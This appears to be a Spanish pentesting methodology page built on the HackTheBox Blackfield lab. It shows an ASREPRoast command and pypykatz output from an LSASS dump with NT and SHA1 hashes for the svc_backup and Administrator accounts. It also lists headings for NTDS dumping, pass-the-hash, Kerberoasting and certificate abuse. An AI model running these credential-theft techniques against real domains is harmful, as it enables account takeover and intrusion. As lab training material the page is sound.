Methodology
methodology
Metodología
ASPRepRoast Attack
GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.192Decrypt LSASS
pypykatz lsa minidump lsass.DMP
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
[...]
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
[...]
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368Dumpear NTDS
Backup del System
Backup del NTDS
Creación de unidad lógica temporal
Fichero.txt
Procesación con DiskShadow
Copia de RoboCopy
Dumpeo hashes NT,LM
PassTheHash
Kerberoasting Attack
SCF Malicioso
Microsoft Active Directory Certificate Services
Generar certificados
Tráfico de Red
Obtener clave SSL para importar en WireShark
Desencriptar LSASS
Obtener macros de documento
Crear diccionario de usuarios a partir de nombres
Certificado PFX
Crack hash
Importar al navegador
Permite tener acceso a recursos que de primera devuelven un código de estado 403, por ejemplo

image
Strings | Obtener más información con un encoder
Last updated